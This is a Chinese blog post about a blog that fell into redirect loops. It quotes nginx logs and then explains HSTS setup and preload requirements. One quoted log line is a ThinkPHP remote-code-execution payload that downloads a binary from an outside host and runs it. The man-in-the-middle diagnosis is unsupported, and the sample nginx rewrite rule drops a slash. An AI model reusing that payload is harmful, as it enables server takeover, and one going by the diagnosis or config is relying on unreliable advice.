Web安全:使用HSTS阻挡中间人攻击

最新推荐文章于 2024-08-11 01:19:40 发布
最新推荐文章于 2024-08-11 01:19:40 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: Web安全千锤百炼 文章标签: 安全 web nginx https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beijiuyizui/article/details/107633414
版权

背景介绍

之前在自己的服务器上架设了博客并发布到了公网,考虑到安全性还特意加了HTTPS支持。稳定运行一段时间之后前两个星期忽然就无法访问了,以下是我的破案纪实。

案发现场:博客无法访问

之前搭建的博客突然不能访问了,浏览器提示重定向次数过多,我就有了不好的预感,去服务器上看扫了一眼nginx访问日志,果然发现了一点猫腻。

41.230.21.146 - - [26/Jul/2020:04:06:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86 -O thinkphp ; chmod 777 thinkphp ; ./thinkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
93.171.157.190 - - [26/Jul/2020:04:28:29 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.243.128.166 - - [26/Jul/2020:05:10:37 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 zgrab/0.x"
177.96.170.216 - - [26/Jul/2020:05:21:32 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
35.220.228.17 - - [26/Jul/2020:05:33:38 +0800] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
46.105.117.7 - - [26/Jul/2020:05:36:30 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 zgrab/0.x"
141.101.105.202 - - [26/Jul/2020:05:36:30 +0800] "GET / HTTP/1.1" 301 169 "http://95.179.179.26:80/" "Mozilla/5.0 zgrab/0.x"
141.101.105.202 - - [26/Jul/2020:05:36:30 +0800] "GET / HTTP/1.1" 301 169 "https://zhiyulife.pp.ua/" "Mozilla/5.0 zgrab/0.x"
151.235.230.43 - - [26/Jul/2020:05:45:03 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
46.105.117.7 - - [26/Jul/2020:05:49:05 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/5.0 zgrab/0.x"
172.69.54.103 - - [26/Jul/2020:05:49:05 +0800] "GET / HTTP/1.1" 301 169 "https://95.179.179.26:443/" "Mozilla/5.0 zgrab/0.x"
172.69.54.103 - - [26/Jul/2020:05:49:05 +0800] "GET / HTTP/1.1" 301 169 "https://zhiyulife.pp.ua/" "Mozilla/5.0 zgrab/0.x"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /manager/top.asp HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /index.php/_login/in HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /11.txt HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /db/admin_yly.sql HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET / HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /cgi-bin HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
139.205.177.98 - - [26/Jul/2020:05:56:58 +0800] "GET /js/preload/example.txt HTTP/1.1" 301 169 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
172.69.33.237 - - [26/Jul/2020:05:57:09 +0800] "GET /db/admin_yly.sql HTTP/1.1" 301 169 "http://95.179.179.26/db/admin_yly.sql" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
172.69.34.226 - - [26/Jul/2020:05:57:09 +0800] "GET /index.php/_login/in HTTP/1.1" 301 169 "http://95.179.179.26/index.php/_login/in" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
172.69.35.69 - - [26/Jul/2020:05:57:09 +0800] "GET / HTTP/1.1" 301 169 "http://95.179.179.26/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
172.69.33.185 - - [26/Jul/2020:05:57:09 +0800] "GET /js/preload/example.txt HTTP/1.1" 301 169 "http://95.179.179.26/js/preload/example.txt" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
172.69.33.43 - - [26/Jul/2020:05:57:09 +0800] "GET /11.txt HTTP/1.1" 301 169 "http://95.179.179.26/11.txt" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"

第一条日志就发现问题了,我的博客是个静态页面网站,跟PHP完全没有关系,而且URL后面跟的那一堆明显是攻击的函数。

invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86 -O thinkphp ; chmod 777 thinkphp ; ./thinkphp ThinkPHP ; rm -rf thinkphp'

再看后面的日志,都是访问一些不知所云的页面,并且都是301重定向,因此我估计在重定向HTTPS的时候出现了问题。

追根溯源,锁定凶手

中间人攻击(英语:Man-in-the-middle attack,缩写:MITM)在密码学和计算机安全领域中是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。在许多情况下这是很简单的(例如,在一个未加密的Wi-Fi 无线接入点的接受范围内的中间人攻击者,可以将自己作为一个中间人插入这个网络)。
一个中间人攻击能成功的前提条件是攻击者能将自己伪装成每一个参与会话的终端,并且不被其他终端识破。中间人攻击是一个(缺乏)相互认证的攻击。大多数的加密协议都专门加入了一些特殊的认证方法以阻止中间人攻击。例如,SSL协议可以验证参与通讯的一方或双方使用的证书是否是由权威的受信任的数字证书认证机构颁发,并且能执行双向身份认证。
来自:维基百科:中间人攻击

中间人攻击是比较常见的网络攻击手段,如果通讯双方缺少有效的认证手段就有可能导致中间人攻击。

一般来说如果网站配置了HTTPS,双方通讯就都是可靠加密了。不过用户习惯很难直接改变,包括我也一样,不会特意去敲上一段https://,因此网站一般都会通过重定向HTTP到HTTPS来保证使用HTTPS。

从可见的日志推断,我认为自己的网站最有可能遭受了中间人攻击。

御敌于外:配置HSTS

基本确定了凶手之后,就可以查询解决方案。一番查找之后,发现针对中间人攻击,目前主要的方案是采用HSTS

HSTS(HTTP Strict Transport Security, HTTP严格传输安全协议)表明网站已经实现了TLS,要求浏览器对用户明文访问的Url重写成HTTPS,避免了始终强制302重定向的延时开销。
来自:电商网站HTTPS实践之路(三)——性能优化篇

HSTS基本语法

落实到具体实现中,就是在响应中增加Strict-Transport-Security头部,其基本语法如下:

Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [; preload]

参数可选说明
max-age必选单位为秒,代表HSTS Header的过期时间,一般设置为1年,即 31536000秒。
includeSubDomains可选如果开启说明当前域名及子域名开启HSTS保护
preload可选只有当你申请将自己的域名加入到浏览器内置列表的时候才需要使用到它

Nginx配置HSTS

对于Nginx来说,只要增加以下配置

server {
  listen xxx.abc.com;
  server_name xxx.abc.com;
  rewrite ^/(.*)$ https://$host$1 permanent;
}
server {
  listen       443 ssl;
  server_name  xxx.abc.com;
  # 增加头部信息
  add_header Strict-Transport-Security "max-age=172800; includeSubDomains";
  ssl_certificate      cert/server.crt;
  ssl_certificate_key  cert/server.key;

  ssl_session_cache    shared:SSL:1m;
  ssl_session_timeout  5m;

  ssl_ciphers  HIGH:!aNULL:!MD5;
  ssl_prefer_server_ciphers  on;

  location / {
    proxy_pass http://localhost:3001;
  }
}

预加载HSTS

不过从HSTS的原理来说即使配置了HSTS依然有被攻击的可能,浏览器第一次或者超期后访问网站时还是要再次请求HTTP。想要解决这个问题最好让浏览器在一开始就知道目标网站使用HTTPS,那么每次访问这个网站将都使用HTTPS进行请求。

预加载HSTS就是实现这个功能。Chrome、Firefox等浏览器内置了一份预加载列表,声明了需要使用HTTPS访问的网址,这样的话每次请求时浏览器内部就自动为其转换为HTTPS。

自建的网站可以申请加入预加载HSTS列表中,官方网址为:https://hstspreload.org 。

在这里插入图片描述

需要满足以下几个要求:

Submission Requirements
If a site sends the preload directive in an HSTS header, it is considered to be requesting inclusion in the preload list and may be submitted via the form on this site.
In order to be accepted to the HSTS preload list through this form, your site must satisfy the following set of requirements:

  1. Serve a valid certificate.
  2. Redirect from HTTP to HTTPS on the same host, if you are listening on port 80.
  3. Serve all subdomains over HTTPS.
    • In particular, you must support HTTPS for the www subdomain if a DNS record for that subdomain exists.
  4. Serve an HSTS header on the base domain for HTTPS requests:
    • The max-age must be at least 31536000 seconds (1 year).
    • The includeSubDomains directive must be specified.
    • The preload directive must be specified.
    • If you are serving an additional redirect from your HTTPS site, that redirect must still have the HSTS header (rather than the page it redirects to).
  1. 有可信的证书
  2. 如果网页有监听80端口,需要重定向到HTTPS
  3. 所有子域名都要使用HTTPS
  4. 添加HSTS响应头,
    • max-age 必须至少是 31536000 秒(1 年)。
    • 必须指定 includeSubDomains 参数。
    • 必须指定 preload 参数。
    • 如果该 HTTPS 网站存在其他重定向,那么重定向也必须具有 HSTS 头。

总结与疑问

其实除了那么多重定向的日志之外,我还在日志中发现了爬虫的痕迹。

以往我所开发的服务都是运行在内网中,就像还在象牙塔中的学生一样,高高筑起的围墙虽然限制了很多自由,但在很多情况下又是对我们的保护。只是将博客部署到公网的服务器上,险恶的现实就露出了自己的獠牙。

当然面对层出不穷的问题,退缩回象牙塔内并不能有所助益。因为网络的开放性注定了攻击者永远存在,因此熟悉并了解攻击者的手段,知难而上解决问题才能继续生存下去。

当然故事还远没有结束,我还是有许多疑问:

  1. 中间人到底在哪里?是暗藏在我的电脑中?还是暗藏在我的服务器中?
  2. 为什么会不断重定向?

参考资料

  1. 对301重定向到HTTPS前遭遇中间人攻击的分析
  2. 从 GitHub 受到中间人攻击一事再看 HSTS
急景凋年
关注
专栏目录
WEB前端常见受攻击方式及解决办法总结
10-15
主要介绍了WEB前端常见受攻击方式及解决办法总结,文中讲解非常细致,帮助大家更好的面对web攻击,感兴趣的朋友可以了解下
WEB网站常见受攻击方式及解决办法讲解
黑夜开发者的博客
09-27 682
系统安全是一个经久不衰的话题,也是一个中大型系统必须考虑的问题,这是一门专门的学问,无数专家学者都在为之努力,今天小编就来向大家介绍一下常见的网站攻击方式以及避免攻击的方案。 跨站脚本攻击(XSS) XSS(Cross Site Scripting),跨站脚本攻击。为和层叠样式表(Cascading Style Sheets,CSS)区分开,所以叫XSS,分为反射型和存储型两种(后续文章会...
linux恶意请求
最新发布
janthinasnail的博客
08-11 277
【代码】linux恶意请求。
如何配置使用 HTTP 严格传输安全HSTS
刘书的IT博客
10-25 1万+
HTTP 严格传输安全HSTS)是一种安全功能,web 服务器通过它来告诉浏览器仅用 HTTPS 来与之通讯,而不是使用 HTTP。本文会说明如何在 Apache2、Nginx 和 Lighttpd 上如何启用 HSTS。在主流的 web 服务器上测试通过: Nginx 1.1.19、 Lighttpd 1.4.28 和 Apache 2.2.22 ,环境为 Ubuntu 12.04、 Debi
HSTS 防止网站劫持
树欲静而风不止
04-20 1755
随着信息时代的热潮,电脑和手机上网是广大网民的必备的项目,他可以用于日常工作、学习、娱乐等,但传统HTTP和HTTPS网站访问劫持率分别达到了95%和17%以上,非常简单的案例打开某传统HTTP和HTTPS网站,浏网站负责人既然在不知情情况下,览器会弹出红包等各种广告页面。其实这还是比较好的,部分传统的网站打开后直接跳转到另一个站点,这让网友目惊口呆,让站长心急。 理解HTTPS重定向的机...
服务器配置HSTS(IIS和Tomcat)
每天学习一点点
04-19 5097
如果缺少HSTS的配置,网站可能会被扫描出如下图所示的漏洞 服务器开启HSTS的方法 IIS操作方法: 确认是否安装 “URL 重写” 或者 “URL Rewrite” 模块 , 如果您已经安装可以跳过。 “URL重写” 模块下载地址 https://www.iis.net/downloads/microsoft/url-rewrite#additionalDownloads 已经安装模块的话,在iis的界面可以看到如下图所示的图标: 点击“添加规则” .
cloud_hsts:将HSTS标头添加到@Nextcloud响应
05-11
HTTP严格传输安全性 此应用程序的唯一目的是将标头添加到不支持通过服务器配置文件(例如.htaccess )配置标头的安装中。 如何安装 下载此存档,将其解压缩到apps/并启用它,或通过应用商店进行安装 通过https访问...
Owin.Hsts:用于 Http 严格传输安全 (HSTS) 规范的 OWIN 中间件
07-12
根据说法,HTTP 严格传输安全 (HSTS) 不仅可以强制加密会话,还可以阻止使用无效数字证书的攻击者,从而保护用户免受多种威胁,尤其是中间人攻击。 HTTP 严格传输安全 (HSTS) 是一种可选的安全增强功能,由 Web ...
Web-安全渗透全套教程中间人.zip
05-22
"Web-安全渗透全套教程中间人.mp4"这个视频教程很可能会涵盖实战演练,让你有机会模拟攻击场景,亲身体验如何检测和防御中间人攻击。通过这样的学习,你可以提高自己的安全意识,更好地保护Web应用和用户数据不受...
WebSecurity:网络安全文档
05-29
7. **安全的HTTP头部**:设置如HSTS(HTTP Strict Transport Security)、HPKP(Public Key Pinning)等安全响应头,可增强网站的安全性,防止中间人攻击和证书欺诈。 8. **错误处理和日志记录**:谨慎处理错误信息...
hsts-everywhere:强制Chrome在所有HTTPS连接上使用HTTP严格传输安全
05-14
HTTP严格传输安全性(HTTP Strict-Transport-Security,简称HSTS)是一种网络安全机制,用于增强网站的加密连接,确保用户与服务器之间的通信始终是通过安全HTTPS协议进行,从而避免中间人攻击、SSL剥离等安全威胁...
域名配置HSTS支持
技术笔记
04-09 393
编辑 Nginx 配置文件(如:/usr/local/nginx/conf/nginx.conf),将下面行添加到你的应用配置的server 块中。在/etc/apache2/httpd.conf增加以下内容至应用的 HTTPS VirtualHost中。将下述配置增加到Lighttpd 配置文件,一般在/etc/lighttpd/lighttpd.conf。三、Lighttpd服务器。
nginx启用HSTS以支持从http到https不通过服务端而自动跳转
热门推荐
liberalman的专栏
05-18 1万+
最近对我的个人网站启用了Https,所以想设置http默认自动转https访问的功能,但又不想总让服务端做转发操作,那样浪费资源。那么有什么好的办法呢?302跳转通常将 HTTP 请求 302 跳转到 HTTPS,但有问题:1.不安全,302 跳转会暴露用户访问站点,易被劫持。2.多增加一次访问,使得客户端响应速度慢。302 跳转需要一个 RTT(The role of packet loss an
因为此网站使用hsts_服务器启用HSTS–HTTP Strict Transport Security – HTTPS教程
weixin_39897749的博客
12-04 882
服务器启用HSTS–HTTP Strict Transport Security – HTTPS教程 HTTP Strict Transport Security (简称 HSTS) , 是一个安全特性,可以让一个网站告诉浏览器它只能使用HTTPS访问,而不是使用HTTP。本教程教您如何在服务器上配置HSTS。Apache# 必须加载 headers 模块: LoadModule header...
浏览器自动转到外国服务器,通过HSTS实现浏览器自动跳转https(非服务器响应跳转)...
weixin_28795271的博客
07-31 947
全称 HTTP Strict Transport SecurityHSTS目的是让浏览器在访问网站的时候浏览器内部自动实现https协议访问(不需要服务器告诉浏览器跳转https)。在没有hsts功能时,需要自己在nginx里配置http跳转https。但是这样每个请求(可能)都需要nginx告诉浏览器你访问的地址需要跳转到https,这样就浪费了时间。hsts需要在第一次访问https时,服务器...
Web 安全HSTS 详解和使用
路多辛的所思所想
06-22 2345
HSTS(HTTP Strict Transport Security) 是一种网络安全机制,可用于防范网络攻击,例如中间人攻击和 CSRF(Cross-Site Request Forgery)等攻击。本文将详细介绍 HSTS 的工作原理、应用场景以及如何在网站中开启 HSTS
web常见攻击及防范措施
gaoqiang1112的博客
12-06 1834
首先简单介绍几种常见的攻击方式: SQL注入 XSS CSRF 点击劫持 中间人攻击 1.SQL 注入 这是一种比较简单的攻击方式。 如果后台人员使用用户输入的数据来组装SQL查询语句的时候不做防范, 遇到一些恶意的输入,最后生成的SQL就会有问题。 比如地址栏输入的是: articlrs/index.php?id=1 发送一...
端口扫描工具终极用法
Zt_Zk的博客
09-11 2602
为什么要做c段探测,运营商分配给IDC机房地址时大部分都是连续IP地址,租给客户(渗透目标)时很大概率会分配同C段内IP地址(除非目标就一个IP地址),使用工具扫描可以探测出同段服务。
运维三 nginx 代理服务
qq_44692240的博客
12-11 266
运维三 负载均衡 轮询 加权 iphash 初步优化 更新模块 前日补充 rewirte选项表格 选项 说明 redirect 临时修改地址值给用户看 状态码302 permanent 永久修改 状态码301 帮助爬虫??? last 不在读其他rewrite 相同作用块中 如果一个在server全局作用块中 另一个在location作用块中 break 不在读其他语句,结束请求 相同作用块中 设置选项后查看
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值